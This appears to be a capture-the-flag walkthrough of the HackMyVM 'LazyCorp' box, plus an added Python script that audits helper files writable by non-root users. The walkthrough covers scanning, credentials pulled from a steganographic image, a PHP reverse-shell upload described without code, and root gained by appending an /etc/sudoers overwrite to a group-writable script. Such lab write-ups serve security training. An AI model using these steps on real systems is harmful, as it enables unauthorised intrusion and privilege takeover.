
HackMyVM box - Easy - LazyCorp

I. Information gathering


1. IP and ports

❯ nmap 192.168.67.0/24
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-21 16:40 +0800
Nmap scan report for 192.168.67.1
Host is up (0.00019s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE
53/tcp   open  domain
5000/tcp open  upnp
7000/tcp open  afs3-fileserver

Nmap scan report for 192.168.67.5
Host is up (0.0017s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

2. Quick checks


Run some quick checks against the discovered ports first.

❯ nmap 192.168.67.5 -p 21 -sC
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-21 16:43 +0800
Nmap scan report for 192.168.67.5
Host is up (0.0022s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-syst:
|   STAT:

...

| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 114      119          4096 Jul 16 12:35 pub

❯ nmap 192.168.67.5 -p 22 -sC
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-21 16:46 +0800
Nmap scan report for 192.168.67.5
Host is up (0.0016s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey:
|   3072 46:82:43:4b:ef:e0:b0:50:04:c0:d5:2c:3c:5c:7d:4a (RSA)
|   256 52:79:ea:92:35:b4:f2:5d:b9:14:f0:21:1c:eb:2f:66 (ECDSA)
|_  256 98:fa:95:86:04:75:31:39:c6:60:26:9e:26:86:82:88 (ED25519)

FTP allows anonymous login here, and there is a pub directory.

Go into the directory, find an image, download it and run it through a tool.

❯ lftp anonymous@192.168.67.5
Password:
lftp anonymous@192.168.67.5:~> ls
drwxr-xr-x    2 114      119          4096 Jul 16 12:35 pub
lftp anonymous@192.168.67.5:/> cd pub
lftp anonymous@192.168.67.5:/pub> ls
-rw-r--r--    1 0        0         1366786 Jul 16 12:35 note.jpg
lftp anonymous@192.168.67.5:/pub> get note.jpg
1366786 bytes transferred
lftp anonymous@192.168.67.5:/pub> exit

This turns up a username and password.

stegseek note.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "creds.txt".
[i] Extracting to "note.jpg.out".
the file "note.jpg.out" does already exist. overwrite ? (y/n)
y

cat note.jpg.out
Username: dev
Password: d3v3l0pm3nt!nt3rn

II. Getting a foothold via the web

1. Trying SSH

We just got an account and password.

Let's try logging in.

❯ ssh dev@192.168.67.5
dev@192.168.67.5's password:
Permission denied, please try again.

Looks like it's not the SSH password.

Next, hammer on port 80.

Run dirsearch first.

[05:07:51] 301 -  311B  - /blog  ->  http://192.168.67.5/blog/
[05:07:51] 403 -  277B  - /blog/
[05:07:59] 200 -   55B  - /robots.txt
[05:07:59] 403 -  277B  - /server-status/
[05:07:59] 403 -  277B  - /server-status
[05:08:02] 301 -  314B  - /uploads  ->  http://192.168.67.5/uploads/
[05:08:02] 403 -  277B  - /uploads/

There is a robots.txt listing two paths; join them together and visit.

curl 192.168.67.5/robots.txt
Disallow: /cms-admin.php
Disallow: /auth-LazyCorp-dev/


curl 192.168.67.5/auth-LazyCorp-dev/cms-admin.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.67.5 Port 80</address>

Nothing there; try the one shown on the site instead.

curl 192.168.67.5/auth-LazyCorp-dev/login.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.67.5 Port 80</address>
</body></html>

Still no luck. Then I thought of trying the path in all lowercase, and the username and password from earlier work there, so I got into the admin panel.


2. Getting a shell

Then upload a file; the php extension isn't restricted, so pop a reverse shell. Since I had already done this box and changed the sudoers permissions, I can't get back in, so I'll just describe the approach.

After getting a shell you can grab the private key, copy it to your machine, fix its permissions and log in with SSH.


Then log in with SSH and get the first flag.

❯ ssh -i id2 arvind@192.168.67.5
arvind@arvindlazycorp:~$ cat user.txt
FLAG{you_got_foothold_nice}

FLAG{you_got_foothold_nice}

3. sudo privilege escalation

Looking at the current directory, there is a reset binary; checking its strings reveals a path.

strings reset
...
/usr/bin/reset_site.sh

It turns out we have write permission on it.

arvind@arvindlazycorp:~$ ls -al /usr/bin/reset_site.sh
-rwxrwxr-x 1 root arvind 56 Aug 21 02:10 /usr/bin/reset_site.sh
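The root cause here is a privileged wrapper that runs a helper script which a non-root group can edit. The following audit script is an added example, not part of the original writeup: it pulls absolute paths out of a binary the way `strings` would and flags any referenced file that a non-root user could modify. The sample "binary" and helper script it builds in `demo()` are constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

# Absolute paths embedded as printable strings (what `strings reset | grep ^/` shows).
PATH_RE = re.compile(rb"/(?:[\w.+-]+/)*[\w.+-]+")


def extract_paths(data: bytes) -> list[str]:
    """Return unique absolute paths found as printable strings in a binary blob."""
    seen: list[str] = []
    for m in PATH_RE.finditer(data):
        p = m.group().decode("ascii")
        if p not in seen:
            seen.append(p)
    return seen


def writable_by_non_root(st: os.stat_result) -> bool:
    """True if someone other than root could modify the file: world-writable,
    group-writable with a non-root group (the reset_site.sh case), or non-root owner."""
    mode = st.st_mode
    if mode & stat.S_IWOTH:
        return True
    if mode & stat.S_IWGRP and st.st_gid != 0:
        return True
    return st.st_uid != 0


def audit_binary(binary_path: str) -> list[str]:
    """Flag every existing regular file referenced by the binary that a non-root user could edit."""
    with open(binary_path, "rb") as f:
        data = f.read()
    findings = []
    for p in extract_paths(data):
        try:
            st = os.stat(p)
        except OSError:
            continue  # path does not exist on this host; nothing to check
        if stat.S_ISREG(st.st_mode) and writable_by_non_root(st):
            findings.append(f"{p} mode={oct(stat.S_IMODE(st.st_mode))} uid={st.st_uid} gid={st.st_gid}")
    return findings


def demo() -> tuple[str, list[str]]:
    """Constructed sample: a fake 'reset' blob referencing a world-writable helper script."""
    d = tempfile.mkdtemp()
    helper = os.path.join(d, "reset_site.sh")
    with open(helper, "w") as f:
        f.write("#!/bin/sh\necho reset\n")
    os.chmod(helper, 0o777)  # deliberately over-permissive, like the group-writable script above
    fake_bin = os.path.join(d, "reset")
    with open(fake_bin, "wb") as f:
        f.write(b"\x7fELF\x00" + helper.encode() + b"\x00/usr/bin/does_not_exist_constructed\x00")
    return helper, audit_binary(fake_bin)


if __name__ == "__main__":
    print("\n".join(demo()[1]))
```

On a real host, point `audit_binary` at the SUID or sudo-allowed wrapper to see which helper scripts it drags in and who can write them.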

Modify the sudoers file.

arvind@arvindlazycorp:~$ echo 'echo "arvind ALL=(ALL:ALL) NOPASSWD:ALL" > /etc/sudoers' >> /usr/bin/reset_site.sh

Finally run it and switch to root.

arvind@arvindlazycorp:~$ ./reset
arvind@arvindlazycorp:~$ sudo su
sudo: unable to resolve host arvindlazycorp: Name or service not known
root@arvindlazycorp:/home/arvind#

FLAG{lazycorp_reset_exploit_worked}

III. Capturing the flags

root@arvindlazycorp:~# cat root.txt /home/arvind/user.txt
FLAG{lazycorp_reset_exploit_worked}
FLAG{you_got_foothold_nice}

License:  CC BY 4.0